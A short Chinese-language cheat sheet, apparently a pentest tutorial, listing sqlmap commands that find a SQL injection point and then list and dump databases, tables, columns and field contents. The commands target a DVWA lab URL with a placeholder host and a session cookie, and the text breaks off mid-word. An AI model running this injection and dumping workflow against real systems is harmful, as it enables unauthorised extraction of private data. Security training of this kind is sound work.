有些网站需要登入的所以必须加cookie绕过登入,不需要登入则不用加
----------------------------------------------------------------------------------
一般步骤:
sqlmap.py -u “http://xxx/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=84693b0adede1f2ab0e8ea4e0e5e580e” 找注入点
sqlmap.py -u “http://xxx/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=84693b0adede1f2ab0e8ea4e0e5e580e” --dbs 获取所有数据库
…省略 -D aaa --tables 获取数据库aaa的所有表
…省略 -D aaa -T bbb --columns 获取数据库aaa中bbb表的所有字段
…省略 -D aaa -T bbb -C ccc --dump 获取数据库aaa中bbb表中ccc字段的所有内容
----------------------------------------------------------------------------------
其它的一些常用命令:
…省略 --current-db 获取当前数据库
…省略 --current-user 获取当前用